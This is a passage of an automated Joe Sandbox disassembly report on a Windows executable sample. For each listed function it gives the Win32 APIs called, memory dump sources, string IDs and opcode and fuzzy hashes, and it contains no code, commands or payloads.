                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ErrorMode$AttributesFile_memmove_wcslen
                                                                                                                    • String ID: \VH
                                                                                                                    • API String ID: 3884216118-234962358
                                                                                                                    • Opcode ID: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                    • Instruction ID: 3f1cdca54a202f1bd1938e87a451cd9606667cca5306a7eaf6ab6c0a6d737147
                                                                                                                    • Opcode Fuzzy Hash: 178592a45c440348c39a3b7bd59973aab5981f95bb0f1257baca06643fcd57b5
                                                                                                                    • Instruction Fuzzy Hash: F9619F715043019BC310EF25C585A5BB7E0BFC8708F04896EFA996B392CB76ED45CB96
                                                                                                                    Function 00448480 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 107windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 00448539
                                                                                                                    • IsMenu.USER32(?), ref: 0044854D
                                                                                                                    • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 0044859B
                                                                                                                    • DrawMenuBar.USER32 ref: 004485AF
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Menu$Item$DrawInfoInsert
                                                                                                                    • String ID: 0
                                                                                                                    • API String ID: 3076010158-4108050209
                                                                                                                    • Opcode ID: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                    • Instruction ID: 7b58e0297b022ec9ba855d833b0382692745775969200e6848d17b537ef0d45f
                                                                                                                    • Opcode Fuzzy Hash: 1799694fe08fa7a149e3e917ddeca428ef12783b8609c92dee7a023332204936
                                                                                                                    • Instruction Fuzzy Hash: 1F417975A00209AFEB10DF55D884B9FB7B5FF59300F14852EE9059B390DB74A845CFA8
                                                                                                                    Function 00469CDB Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 100windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • SendMessageW.USER32(?,00000188,00000000,00000000), ref: 00469D69
                                                                                                                    • SendMessageW.USER32(?,0000018A,00000000,00000000), ref: 00469D7C
                                                                                                                    • SendMessageW.USER32(?,00000189,00000000,00000000), ref: 00469DAC
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: MessageSend$_memmove_wcslen
                                                                                                                    • String ID: ComboBox$ListBox
                                                                                                                    • API String ID: 1589278365-1403004172
                                                                                                                    • Opcode ID: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                    • Instruction ID: b025c67d46b61e1fa51b41144ded2117d8c1ab71acdc4e5cb50a5164a05e923b
                                                                                                                    • Opcode Fuzzy Hash: 4395ff4c2c8cdf0c8fa99ec605851f177d12593d5a8a66f2884a0b9051c55526
                                                                                                                    • Instruction Fuzzy Hash: 8D31287160010477DB10BB69CC45BEF775C9F86324F10852FF918AB2D1DABC9E4583A6
                                                                                                                    Function 00443442 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 93COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Handle
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 2519475695-2873401336
                                                                                                                    • Opcode ID: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                    • Instruction ID: 058e2060cb23de8d889deff533ab301820a4ae088d702658d54b05e79d5a48de
                                                                                                                    • Opcode Fuzzy Hash: efdaae6ab43bf4356d88622121a7e42c7f624cc6de1d12637521731ec53ca4c5
                                                                                                                    • Instruction Fuzzy Hash: 84319571500204ABEB20DF68DC46BEB77A8EF04721F104A4EFD50973D1E7B59A50CBA5
                                                                                                                    Function 0044334F Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 92COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetStdHandle.KERNEL32(000000F6), ref: 0044337D
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Handle
                                                                                                                    • String ID: nul
                                                                                                                    • API String ID: 2519475695-2873401336
                                                                                                                    • Opcode ID: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                    • Instruction ID: 7fb8f1e98e57093f7bc771e71f756598ee5282d4f5ffeaa4ddc08f3ab3272662
                                                                                                                    • Opcode Fuzzy Hash: 97b946d9a765a46b1e85699804a5cf49c651f34dfecb3a2317456e71fe30ed78
                                                                                                                    • Instruction Fuzzy Hash: 05219331600204ABE720DF689C49FAB77A8EF55731F20474EFDA0972D0EBB59A50C795
                                                                                                                    Function 00440C49 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 91COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: SysAnimate32
                                                                                                                    • API String ID: 0-1011021900
                                                                                                                    • Opcode ID: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                    • Instruction ID: b1a10ecfd0a3fc3d2af2854cd73c9de1262d8b9fd4b2252518a975ef6c54cff1
                                                                                                                    • Opcode Fuzzy Hash: 8caf53187f6e77aecacb49307b2e697766faa1bc511b1160dce697a174d3407c
                                                                                                                    • Instruction Fuzzy Hash: 0D21C975600205ABFB149EA9EC81FAB73DCEB95324F20471BF711972C0D279EC518768
                                                                                                                    Function 00461554 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 74windowCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
                                                                                                                      • Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193
                                                                                                                      • Part of subcall function 0043646A: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,00000001), ref: 00436489
                                                                                                                      • Part of subcall function 0043646A: GetWindowThreadProcessId.USER32(?,00000000), ref: 0043649C
                                                                                                                      • Part of subcall function 0043646A: GetCurrentThreadId.KERNEL32 ref: 004364A3
                                                                                                                      • Part of subcall function 0043646A: AttachThreadInput.USER32(00000000), ref: 004364AA
                                                                                                                    • GetFocus.USER32 ref: 0046157B
                                                                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364C3
                                                                                                                      • Part of subcall function 004364B5: GetParent.USER32(?), ref: 004364CF
                                                                                                                    • GetClassNameW.USER32(?,?,00000100), ref: 004615C4
                                                                                                                    • EnumChildWindows.USER32(?,Function_00045B98,?), ref: 004615EF
                                                                                                                    • __swprintf.LIBCMT ref: 00461608
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Thread$Parent$AttachChildClassCurrentEnumFocusInputMessageNameProcessSendTimeoutWindowWindows__swprintf_memmove_wcslen
                                                                                                                    • String ID: %s%d
                                                                                                                    • API String ID: 2645982514-1110647743
                                                                                                                    • Opcode ID: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                    • Instruction ID: 8eac61321038dbd32bfe14263504560db7c98c8fbeeeb2eb49a46d34c9d63f73
                                                                                                                    • Opcode Fuzzy Hash: 964dbc2a73d3b51658c129c0940897b8911b785c40af9afe88b96a44e5c449bd
                                                                                                                    • Instruction Fuzzy Hash: 272180756007096BD610AF69DC89FAF73A8FB88704F00841FF918A7241DAB8A9418B69
                                                                                                                    Function 00462A31 Relevance: 7.7, APIs: 5, Instructions: 227COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID:
                                                                                                                    • API String ID:
                                                                                                                    • Opcode ID: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                    • Instruction ID: b0f148a0463f8e77612455c4d0488571574065cadd758f34d18f988e9301810f
                                                                                                                    • Opcode Fuzzy Hash: 0beeaaa579c9339ee211e6c40176bce708d39a94b7630d2852c1f2343b6e5e4f
                                                                                                                    • Instruction Fuzzy Hash: 2A819F74600604BFEB24CF95C994FBB7B68EF59350F10804EF8959B341E6B8AC45CB6A
                                                                                                                    Function 004757A7 Relevance: 7.7, APIs: 5, Instructions: 220COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCurrentProcessId.KERNEL32(?), ref: 0047584D
                                                                                                                    • OpenProcess.KERNEL32(00000410,00000000,00000000), ref: 0047585B
                                                                                                                    • GetProcessIoCounters.KERNEL32(00000000,?), ref: 0047587F
                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00475A4D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Process$CloseCountersCurrentHandleOpen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3488606520-0
                                                                                                                    • Opcode ID: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                    • Instruction ID: 747e8e91012d04cc7bcfbda4f2b49d0ca9967bea8b965680eccea6cdbc9dea0c
                                                                                                                    • Opcode Fuzzy Hash: ce4ed15879a0d4705bc9675b55154bd71a0022cbb1f9dd3a70cee976304ba055
                                                                                                                    • Instruction Fuzzy Hash: 82817170A047029FD310DF65C981B4BBBE1BF84704F10892EF6999B3D2DA75E944CB96
                                                                                                                    Function 0046B4CF Relevance: 7.7, APIs: 5, Instructions: 157registryCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0046B5B5
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ConnectRegistry_memmove_wcslen
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 15295421-0
                                                                                                                    • Opcode ID: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                    • Instruction ID: 481e56be03c4cee60d8ca92471cfa4b3875eab78bcfcbf7fb961631f720e0f99
                                                                                                                    • Opcode Fuzzy Hash: d8d3d6a2cecaed762a510ed52f320a3b4f5546c74b9e94ec6e10ba7928b5d5b3
                                                                                                                    • Instruction Fuzzy Hash: 7D515F71208301ABD304EF65C885E5BB7A8FF88704F10892EB54597291D774E945CBA6
                                                                                                                    Function 00464812 Relevance: 7.6, APIs: 5, Instructions: 145libraryloaderCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • LoadLibraryW.KERNEL32(00000000,?,?,?), ref: 0046485D
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 004648F7
                                                                                                                    • GetProcAddress.KERNEL32(?,00000000), ref: 00464916
                                                                                                                    • GetProcAddress.KERNEL32(?,?), ref: 0046495A
                                                                                                                    • FreeLibrary.KERNEL32(?,?,?,?), ref: 0046497C
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AddressProc$Library$FreeLoad
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2449869053-0
                                                                                                                    • Opcode ID: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                    • Instruction ID: 8919579e2c9fc9b2d94c4928dd3202a5bdd7863bc063e44bf2a6fba2f1eed130
                                                                                                                    • Opcode Fuzzy Hash: 178b694003ef1c8c6ddf6c03964e3c93f4f33891ff2eeadba8088ba5e41252f8
                                                                                                                    • Instruction Fuzzy Hash: 2351BF756002049FCB00EFA4C985A9EB7B4EF88304F14856EFD05AB392DB79ED45CB99
                                                                                                                    Function 00456391 Relevance: 7.6, APIs: 5, Instructions: 130keyboardCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetCursorPos.USER32(?), ref: 004563A6
                                                                                                                    • ScreenToClient.USER32(?,?), ref: 004563C3
                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00456400
                                                                                                                    • GetAsyncKeyState.USER32(?), ref: 00456410
                                                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 00456466
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: AsyncState$ClientCursorLongScreenWindow
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3539004672-0
                                                                                                                    • Opcode ID: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                    • Instruction ID: 60090bce41a6de58f2ab96a8453d1e3558661e38fd0c916b19f374a884add038
                                                                                                                    • Opcode Fuzzy Hash: 47775ca2c9d3ed855d965de7f9cc13cd0d0477b61ed95063c4b58fcc2d2fd159
                                                                                                                    • Instruction Fuzzy Hash: 49414C74504204BBDB24CF65C884EEFBBB8EB46326F60464EFC6593281CB34A944CB68
                                                                                                                    Function 0047D40F Relevance: 7.6, APIs: 5, Instructions: 120sleepCOMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D438
                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D44D
                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 0047D455
                                                                                                                    • InterlockedIncrement.KERNEL32(004A7F04), ref: 0047D460
                                                                                                                    • InterlockedDecrement.KERNEL32(004A7F04), ref: 0047D56A
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000000.00000002.2143625140.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                    • Associated: 00000000.00000002.2143603116.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143745783.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143795001.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143822197.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143855581.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    • Associated: 00000000.00000002.2143890416.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_0_2_400000_enkJ6J7dAn.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Interlocked$DecrementIncrement$Sleep
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 327565842-0
                                                                                                                    • Opcode ID: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                    • Instruction ID: e00c67d4cb89bf1d5311357fb713975cbca1e0cfcee7190b0451066ade77f289
                                                                                                                    • Opcode Fuzzy Hash: a05157aca8d30d558f467c32ec822d8ac937f36e77973d55cccdaa836f381863
                                                                                                                    • Instruction Fuzzy Hash: CC412571A002055FEB10DF65CD84AEE7774EF45304B10852EF609A7351E738EE46CB99
                                                                                                                    Function 0045C3C1 Relevance: 7.6, APIs: 5, Instructions: 118COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    APIs
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,?,?,00007FFF), ref: 0045C44F
                                                                                                                    • GetPrivateProfileSectionW.KERNEL32(00000000,00000003,?,00000003), ref: 0045C477
                                                                                                                    • WritePrivateProfileSectionW.KERNEL32(00000000,00000003,?), ref: 0045C4C3
                                                                                                                    • WritePrivateProfileStringW.KERNEL32(00000000,?,00000000,00000000), ref: 0045C4E7
